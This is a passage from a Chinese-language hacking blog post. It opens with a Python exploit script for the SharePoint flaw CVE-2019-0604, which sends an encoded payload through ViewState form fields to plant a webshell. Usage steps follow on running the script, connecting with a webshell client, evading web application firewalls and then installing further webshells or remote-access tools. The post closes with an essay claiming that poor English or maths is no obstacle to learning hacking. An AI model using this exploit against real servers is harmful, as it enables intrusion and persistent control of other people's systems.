'__VIEWSTATE':'/wEPDwULLTIwNTYyMzI3OTQPZBYCZg9kFgQCBQ9kFgICBQ9kFgJmD2QWAgIBD2QWAmYPFgIeBFRleHQFBlBpY2tlcmQCCQ9kFgICBw9kFgwCAw9kFgJmDxYEHgxFcnJvck1lc3NhZ2VlHgtIdG1sTWVzc2FnZQVpPHNwYW4gY2xhc3M9Im1zLWVycm9yIj5BbiBlcnJvciBvY2N1cnJlZC4gQWRtaW5pc3RyYXRvcnMsIHNlZSB0aGUgc2VydmVyIGxvZyBmb3IgbW9yZSBpbmZvcm1hdGlvbi48L3NwYW4+ZAIFD2QWAmYPZBYCZg9kFgJmD2QWAgIBD2QWAmYPDxYCHwBlFgIeCW9ua2V5ZG93bgW1AXZhciBlPWV2ZW50OyBpZighZSkgZT13aW5kb3cuZXZlbnQ7IGlmKCFicm93c2VyaXMuc2FmYXJpICYmIGUua2V5Q29kZT09MTMpIHsgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2N0bDAwX1BsYWNlSG9sZGVyRGlhbG9nQm9keVNlY3Rpb25fY3RsMDdfcXVlcnlCdXR0b24nKS5jbGljaygpOyByZXR1cm4gZmFsc2U7IH1kAgcPZBYCZg8PFgIfAAVpPHNwYW4gY2xhc3M9Im1zLWVycm9yIj5BbiBlcnJvciBvY2N1cnJlZC4gQWRtaW5pc3RyYXRvcnMsIHNlZSB0aGUgc2VydmVyIGxvZyBmb3IgbW9yZSBpbmZvcm1hdGlvbi48L3NwYW4+ZGQCCQ9kFgJmDw8WAh8AZWRkAgsPZBYCZg8PFgIeEkNPTFVNTkRJU1BMQVlOQU1FUxYAZGQCDQ9kFgICAQ9kFgQCAQ8WAh4FdmFsdWUFBkFkZCAtPmQCAw9kFgJmDw8WCh4OQ1VTVE9NUFJPUEVSVFllHgVXaWR0aBsAAAAAAABZQAcAAAAeCUlTQ0hBTkdFRGgeBF8hU0ICgAIeDEVuYWJsZUJyb3dzZWgWGB4OZWRpdG9yT2xkVmFsdWVlHgpSZW1vdmVUZXh0BQZSZW1vdmUfBWUeDU5vTWF0Y2hlc1RleHQFEU5vIE1hdGNoaW5nIEl0ZW1zHgphbGxvd0VtcHR5BQExHg1Nb3JlSXRlbXNUZXh0BQ1Nb3JlIEl0ZW1zLi4uHhhwcmVmZXJDb250ZW50RWRpdGFibGVEaXYFBHRydWUeHXNob3dEYXRhVmFsaWRhdGlvbkVycm9yQm9yZGVyBQVmYWxzZR4LYWxsb3dUeXBlSW4FBWZhbHNlHgppblZhbGlkYXRlBQVmYWxzZR4bRUVBZnRlckNhbGxiYWNrQ2xpZW50U2NyaXB0ZR4eU2hvd0VudGl0eURpc3BsYXlUZXh0SW5UZXh0Qm94BQEwFgICBA8PFgYfBxsAAAAAAABZQAcAAAAeCENzc0NsYXNzBQ1tcy11c2VyZWRpdG9yHwkCggJkFgRmDw8WBB4NVmVydGljYWxBbGlnbgsqJ1N5c3RlbS5XZWIuVUkuV2ViQ29udHJvbHMuVmVydGljYWxBbGlnbgMfCQKAgAhkFgJmD2QWAmYPZBYCZg9kFgJmD2QWBGYPFigeCHRhYmluZGV4BQEwHgdvbmZvY3VzBbEBU3RvcmVPbGRWYWx1ZSgnY3RsMDBfUGxhY2VIb2xkZXJEaWFsb2dCb2R5U2VjdGlvbl9jdGwwNScpOyBzYXZlT2xkRW50aXRpZXMoJ2N0bDAwX1BsYWNlSG9sZGVyRGlhbG9nQm9keVNlY3Rpb25fY3RsMDUnKTsgU3lzLlVJLkRvbUVsZW1lbnQuYWRkQ3NzQ2xhc3ModGhpcywgJ21zLWlucHV0Qm94QWN0aXZlJyk7Hg5hcmlhLW11bHRpbGluZQUEdHJ1ZR4Gb25ibHVyBYEDaWYodHlwZW9mKEV4dGVybmFsQ3VzdG9tQ29udHJvbENhbGxiYWNrKT09J2Z1bmN0aW9uJyl7IGlmKFNob3VsZENhbGxDdXN0b21DYWxsQmFjaygnY3RsMDBfUGxhY2VIb2xkZXJEaWFsb2dCb2R5U2VjdGlvbl9jdGwwNScsZXZlbnQpKXtpZighVmFsaWRhdGVQaWNrZXJDb250cm9sKCdjdGwwMF9QbGFjZUhvbGRlckRpYWxvZ0JvZHlTZWN0aW9uX2N0bDA1Jykpe1Nob3dWYWxpZGF0aW9uRXJyb3IoKTtyZXR1cm4gZmFsc2U7fWVsc2Uge0V4dGVybmFsQ3VzdG9tQ29udHJvbENhbGxiYWNrKCdjdGwwMF9QbGFjZUhvbGRlckRpYWxvZ0JvZHlTZWN0aW9uX2N0bDA1Jyk7fX19IFN5cy5VSS5Eb21FbGVtZW50LnJlbW92ZUNzc0NsYXNzKHRoaXMsICdtcy1pbnB1dEJveEFjdGl2ZScpOx4Hb25jbGljawVHb25DbGlja1J3KHRydWUsIHRydWUsZXZlbnQsJ2N0bDAwX1BsYWNlSG9sZGVyRGlhbG9nQm9keVNlY3Rpb25fY3RsMDUnKTseCG9uY2hhbmdlBT91cGRhdGVDb250cm9sVmFsdWUoJ2N0bDAwX1BsYWNlSG9sZGVyRGlhbG9nQm9keVNlY3Rpb25fY3RsMDUnKTseB29uUGFzdGUFOmRvcGFzdGUoJ2N0bDAwX1BsYWNlSG9sZGVyRGlhbG9nQm9keVNlY3Rpb25fY3RsMDUnLGV2ZW50KTsfEAUEdHJ1ZR4MQXV0b1Bvc3RCYWNrBQEwHgRyb3dzBQExHgtvbkRyYWdTdGFydAUOY2FuRXZ0KGV2ZW50KTseB29ua2V5dXAFPXJldHVybiBvbktleVVwUncoJ2N0bDAwX1BsYWNlSG9sZGVyRGlhbG9nQm9keVNlY3Rpb25fY3RsMDUnKTseBm9uQ29weQU5ZG9jb3B5KCdjdGwwMF9QbGFjZUhvbGRlckRpYWxvZ0JvZHlTZWN0aW9uX2N0bDA1JyxldmVudCk7HgV0aXRsZQUURXh0ZXJuYWwgSXRlbSBQaWNrZXIfAwVQcmV0dXJuIG9uS2V5RG93blJ3KCdjdGwwMF9QbGFjZUhvbGRlckRpYWxvZ0JvZHlTZWN0aW9uX2N0bDA1JywgMywgZmFsc2UsIGV2ZW50KTseCnNwZWxsY2hlY2sFBWZhbHNlHg9jb250ZW50RWRpdGFibGUFBHRydWUeDWFyaWEtaGFzcG9wdXAFBHRydWUeBXN0eWxlBTp3b3JkLXdyYXA6IGJyZWFrLXdvcmQ7b3ZlcmZsb3cteDogaGlkZGVuO292ZXJmbG93LXk6IGF1dG87HgRyb2xlBQd0ZXh0Ym94ZAIBDw8WCh4IVGFiSW5kZXgBAAAfBxsAAAAAAABZQAcAAAAeBFJvd3MCAR8faB8JAoACFhIfGQWxAVN0b3JlT2xkVmFsdWUoJ2N0bDAwX1BsYWNlSG9sZGVyRGlhbG9nQm9keVNlY3Rpb25fY3RsMDUnKTsgc2F2ZU9sZEVudGl0aWVzKCdjdGwwMF9QbGFjZUhvbGRlckRpYWxvZ0JvZHlTZWN0aW9uX2N0bDA1Jyk7IFN5cy5VSS5Eb21FbGVtZW50LmFkZENzc0NsYXNzKHRoaXMsICdtcy1pbnB1dEJveEFjdGl2ZScpOx8iBT1yZXR1cm4gb25LZXlVcFJ3KCdjdGwwMF9QbGFjZUhvbGRlckRpYWxvZ0JvZHlTZWN0aW9uX2N0bDA1Jyk7HyQFFEV4dGVybmFsIEl0ZW0gUGlja2VyHx0FP3VwZGF0ZUNvbnRyb2xWYWx1ZSgnY3RsMDBfUGxhY2VIb2xkZXJEaWFsb2dCb2R5U2VjdGlvbl9jdGwwNScpOx8bBYEDaWYodHlwZW9mKEV4dGVybmFsQ3VzdG9tQ29udHJvbENhbGxiYWNrKT09J2Z1bmN0aW9uJyl7IGlmKFNob3VsZENhbGxDdXN0b21DYWxsQmFjaygnY3RsMDBfUGxhY2VIb2xkZXJEaWFsb2dCb2R5U2VjdGlvbl9jdGwwNScsZXZlbnQpKXtpZighVmFsaWRhdGVQaWNrZXJDb250cm9sKCdjdGwwMF9QbGFjZUhvbGRlckRpYWxvZ0JvZHlTZWN0aW9uX2N0bDA1Jykpe1Nob3dWYWxpZGF0aW9uRXJyb3IoKTtyZXR1cm4gZmFsc2U7fWVsc2Uge0V4dGVybmFsQ3VzdG9tQ29udHJvbENhbGxiYWNrKCdjdGwwMF9QbGFjZUhvbGRlckRpYWxvZ0JvZHlTZWN0aW9uX2N0bDA1Jyk7fX19IFN5cy5VSS5Eb21FbGVtZW50LnJlbW92ZUNzc0NsYXNzKHRoaXMsICdtcy1pbnB1dEJveEFjdGl2ZScpOx8oBSJkaXNwbGF5OiBub25lO3Bvc2l0aW9uOiBhYnNvbHV0ZTsgHwMFUHJldHVybiBvbktleURvd25SdygnY3RsMDBfUGxhY2VIb2xkZXJEaWFsb2dCb2R5U2VjdGlvbl9jdGwwNScsIDMsIGZhbHNlLCBldmVudCk7Hx8FATAeGnJlbmRlckFzQ29udGVudEVkaXRhYmxlRGl2BQR0cnVlZAICDw8WAh4HVmlzaWJsZWhkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgU0Y3RsMDAkUGxhY2VIb2xkZXJEaWFsb2dCb2R5U2VjdGlvbiRjdGwwNyRxdWVyeUJ1dHRvbgUoY3RsMDAkUGxhY2VIb2xkZXJEaWFsb2dCb2R5U2VjdGlvbiRjdGwwNVdO0+ZP+kKR1gMQud0zVHpuy8sqq7e4YSOgfg1USdFj',
'__VIEWSTATEGENERATOR':'A123E449',
ct1+paySection+'$ctl07$queryTextBox':'',
paySpanData:payload1+'4700440016004700160005002700f60067009600460056002700c200020005002700560037005600e6004700160047009600f600e600640027001600d60056007700f6002700b600c200020065005600270037009600f600e600d3004300e2000300e2000300e2000300c200020034005700c6004700570027005600d300e60056005700470027001600c600c2000200050057002600c60096003600b400560097004500f600b6005600e600d3003300130026006600330083005300630016004600330063004300560033005300d500d500c200020035009700370047005600d600e2004400160047001600e20035005600270067009600360056003700c200020065005600270037009600f600e600d3004300e2000300e2000300e2000300c200020034005700c6004700570027005600d300e60056005700470027001600c600c2000200050057002600c60096003600b400560097004500f600b6005600e600d3002600730073001600530036005300630013009300330043005600030083009300a300c300f300'+payload2+'5600c300f200d400560047008600f6004600e4001600d6005600e300d000a0000200020002000200c300d400560047008600f60046000500160027001600d60056004700560027003700e300d000a000020002000200020002000200c3001600e600970045009700070056000200870037009600a3004700970007005600d3002200870037004600a3003700470027009600e60076002200e3006200c6004700b300250056003700f600570027003600560044009600360047009600f600e600160027009700d000a0008700d600c600e6003700d30022008600470047000700a300f200f2003700360086005600d60016003700e200d600960036002700f6003700f60066004700e2003600f600d600f20077009600e60066008700f2002300030003006300f20087001600d600c600f20007002700560037005600e6004700160047009600f600e6002200d000a0008700d600c600e6003700a3008700d30022008600470047000700a300f200f2003700360086005600d60016003700e200d600960036002700f6003700f60066004700e2003600f600d600f20077009600e60066008700f2002300030003006300f20087001600d600c6002200d000a0008700d600c600e6003700a30035009700370047005600d600d30022003600c6002700d200e6001600d600560037000700160036005600'+payload3+'0e200250056000700c6001600360056008200070077004600b2002200d300d300d3002200c200220022009200b300560067001600c60082003600f60046005600c20022005700e600370016006600560022009200b3000200d700b3005200e500620076004700b3000200620076004700b3000200220052003400f600d600d600f600e60005002700f600760027001600d60064009600c600560037005200c500d400960036002700f6003700f600660047000200350086001600270056004600c500750056002600020035005600270067005600270002005400870047005600e60037009600f600e6003700c50013005300c50045005400d4000500c400140045005400c500c40014009500f400550045003500c50057001600e2001600370007008700220002006200c6004700b300f20035009700370047005600d600a3003500470027009600e6007600620076004700b300d000a000900090006200c6004700b300f200f4002600a600560036004700440016004700160005002700f60067009600460056002700e200d400560047008600f60046000500160027001600d60056004700560027003700620076004700b300d000a00090006200c6004700b300f200f4002600a600560036004700440016004700160005002700f60067009600460056002700620076004700b300d000a0006200c6004700b300f200250056003700f600570027003600560044009600360047009600f600e600160027009700620076004700b300d000a000c300f2001600e60097004500970007005600e300d000a0000200020002000200c300f200d400560047008600f60046000500160027001600d60056004700560027003700e300d000a00002000200c300f20005002700f600a6005600360047005600460005002700f600070056002700470097000300e300d000a000c300f2005400870007001600e6004600560046007500270016000700070056002700f400660085001600d600c600250056001600460056002700f4002600a600560036004700440016004700160005002700f60067009600460056002700e300',
ct1+paySection+ct2+'$OriginalEntities':'<Entities />',
ct1+paySection+ct2+'$HiddenEntityKey':'',
ct1+paySection+ct2+'$HiddenEntityDisplayText':'',
ct1+paySection+ct2+'$downlevelTextBox':' ',
'__CALLBACKID':ct1+paySection+'$ctl07',
'__CALLBACKPARAM':';#;#11;#;#;#',
'__EVENTVALIDATION':'/wEdAArGxMN0ZJ7K9w5zktdyYEhBD0ElpjQ1qya+g3gJn5tj2kGdpzwPwReE9qIrxAfsdm2iW+aWbiEcyxsYaScsTlQ450VsGNyXdI9EVzK0gDisZ5XfOLdqAfYHRFskSc14VkFc8gJL9PF80m6F3xAWwiF2sOBSyZzTvibJdZIQ6/yiluhmzA7nAUttaM/XaeAk14GgLvO2vw2Ax/oUZshBCs1rvRIjfjnjQxx1nrwDNJpAlG8icRe2xKLDvCGTmWjcu2A='}

data = urllib.urlencode(values)
req = urllib2.Request(url+spver, data)
response = urllib2.urlopen(req)
the_page = response.read()
print exp+'\n'+payload5
print the_page

headers = {
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
    "Accept-Language": "en",
    "Cache-Control": "max-age=0",
    "Connection": "keep-alive",
    "Cookie": "PHPSESSID=m2hbrvp548cg6v4ssp0l35kcj7; _ga=GA1.2.2052701472.1532920469; _gid=GA1.2.1351314954.1532920469; __atuvc=3%7C31; __atuvs=5b5e9a0418f6420c001",   
    #"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36",
	"Upgrade-Insecure-Requests": "1",
	uapay: payload4,
	}

data = {"__CALLBACKID": "",
        "__VIEWSTATE": "",
        'ctl00$'+paySection+'$': "",
        "__CALLBACKID": "All",
        "__CALLBACKPARAM": ""}

response = requests.get(shellurl, headers=headers, timeout=5)
if response.content=='UAshell':
	print 'UAshell: '+shellurl

 

實戰:

python cve-2019-0604-exp.py http://k8gege.github.io

若成功返回WebShell地址

UAshell訪問報錯，你們不要慌，本來設計就是這樣子

使用K8飛刀CMD鏈接，固然你能夠經過CMD下載其它的WebShell過去管理

好比菜刀,由於飛刀UA系列的WebShell除了過WAF，均無文件管理功能

使用UA而不使用菜刀一句話，是由於菜刀一句話都是POST，容易被WAF攔截

固然你傳過去後發現目標無WAF或無殺軟，再傳其它Webshell或植入遠控均可以

 

下載：

 https://github.com/k8gege/CVE-2019-0604

 https://github.com/k8gege/K8tools/raw/master/cve-2019-0604-exp.py

Tips:

最近剛高考完不久，因此會在羣裏看到一些人說學信息安全須要英文、數學好才能學得好。

1.英文

英語這個就不用說了，文章開頭的「段子」，最先是劍橋大學發的，就是說那個「段子」是英文的

說明了什麼，所謂語法並不重要，中文也是同樣，當你有必定意識，亂你也看得懂。

打個比方，你們都懂的SQL注入基礎，文中告訴你注入點URL和SQL注入參數，

無論是英文仍是中文文章，你都知道如何利用Sqlmap去跑吧，可是你讓一個無基礎的

就算是中文的寫的很是詳細的，不說中文有人用他的家鄉話和他說，他都不懂。

文章開頭那個「段子」看完大腦自動排序拼接成通順句子，前提也是他有必定基礎

不少人說什麼新的漏洞新的APT攻擊都是英文的看不懂，這關英文的事？？？

GOOGLE翻譯、百度翻譯被你吃了？？？最多就是翻譯後中文順序亂而已？

你沒上太小學，漢字都看不懂？？？真正看不懂的人是所謂APT裏的技術看的人不懂

目前90%的APT文章所提到的技術80%都是10年前的技術，並沒有多少新技術。

卻是新的名詞一堆一堆，和之前相比聽起來很是高大上，實際上技術變化不大。

 

2.數學

數學若是說是考試的話，數學方面國人絕對甩老外幾百條街，

據說國外對數很頭疼 ,國外不少大學數學內容竟是中國初中數學

可是最可笑的是不少數學定理倒是老外發明的，是否是說明了什麼

爲何老外考試不好，但科技仍是不少方面卻很是強。

 

3.實例

先給你們舉個例子，我有兩個高中同窗一個是當年惟一考得上柳高的人綜合成績整年級第一。

另外一個也很歷害，年級前10吧，但我重點要說的是他的英文很優秀，物理數學也算是優吧

但單科他們都要請教我，好比我物理化學基本上也是整年級第一，並且是實打實，得知幾分

立馬知道錯哪裏，爲何錯那種，而其它人表面高分，未必知到錯哪，需老師講解後才懂。

而我是全校出了名的偏科，個人英文並很差（初中的時候英文老師說我不學英文就混不了）

表面上我英文幾十分偶爾極格，就算是也只是表面極格，實際上個人英文和倒數第一差很少

對於兩位高中同窗，我給他們英文數學的評價優秀，大學他們去學了計算機軟件開發專業。

大學的時候他們和我說畢業之後要給銀行開發系統什麼之類的，聽着很是牛逼的樣子。

當時他們吹本身IT方面很牛，黑客技術很歷害，說本身的生活費都是盜號來的。

我覺得他們真的很歷害，由於當時盜號真的很容易，那會我還不是很會編程。

在我眼裏會編程的很牛B，況且他們說他們隨便寫什麼系統，盜號軟件之類的。

過了半年左右吧，回老家遇到他們，他們好像知道我真的懂，就和我說他們是吹的

想和我學，我說大家要真有興趣能夠去哪些網站上面有我視頻，也沒見他們去。

畢業據說成績整年級第一的如今據說在跑業務了，另一個如今在當小學老師。

不說個人同窗，大家的同窗，先不說有多少進入這行的大牛和信安專業無關，

先看看大家不少信安專業畢業的，同一個班裏有幾個畢業了從事信安專業的？

有些人的同窗裏有那些英文很好的，但也沒見得從事這行呀。

 

4.我認爲學好IT最重要的一點是興趣、邏輯思惟

解數學題是訓練邏輯思惟的最好方法，數學好的邏輯思惟基本上都不錯。

但數學並非惟一的訓練方法，好比推理、下棋啊，須要思考的方法

滲透的時候不就是須要嘗試各類方法嗎，寫程序也同樣須要嘗試各類函數

不少程序員死板，是由於他們的工做太單一，來來去去就寫固定模塊或功能

固然邏輯思惟不錯，也不表明他在IT方面就強，他還得有興趣學這個。

注意我指的是那些真懂的，不是死記硬背不懂觸類旁通，表面考試高分的那種。

這也是爲何不少人考試歷害，實際上卻幹不過國外的真正緣由。

 

若是笨的人呢就不適合這行嗎？固然沒有別人聰明也不要緊，你須要多花時間學習

最多就是起步慢一些，不少東西天然會懂的，來來去去就幾招，沒有學不會的。

可是你本身菜，還要拿英語、數學很差這種來當藉口的話，我認爲你是真的不適合

若是你一直幹這行，你的水平會一直停留在等別人發佈文章或工具甚至教程的狀態。

 

就拿本文EXP來講，你說英文很差是吧，你能夠不看原文，國內有不少英文好的翻譯好了

有直接的中文文章中文你看不懂嗎？再說cve-2019-0604漏洞出來那麼久，你身邊英文好的

有幾個研究出EXP了？對於中文的不少人都看得懂了吧，爲何也還沒人放出EXP工具

真正的緣由是什麼，並不是你是否看得懂哪國文字，根本緣由在於你當前的技術水平。

英文好最多就是看英文和看中文同樣流暢，翻譯成中文看起來同樣速度快（大腦自動排序）

明明錯亂順序的文字你同樣看得懂，更況且大部份翻譯也不是太差，菜和英文真的無關。

寫代碼就更不須要了，不少開發工具都有提示的，打出首字母會顯示出不少，

只要你知道大概長啥樣就能夠，再不濟百度Google查詢，微軟工程師開發的工具，

寫代碼時本身都要查看相關文檔，科學家研究東西照樣須要查找各類資料。

還有不少大牛都說看書只是入門，GOOGLE纔是提升(TK在微博和知乎上也常常說這句話)

你區區一個搞IT的，百度GOOGLE查資料你丟臉了？又菜又懶還喜歡找各類藉口

這個世界上最可怕的不是有人比你聰明。而是那些比你聰明的人。還比你努力。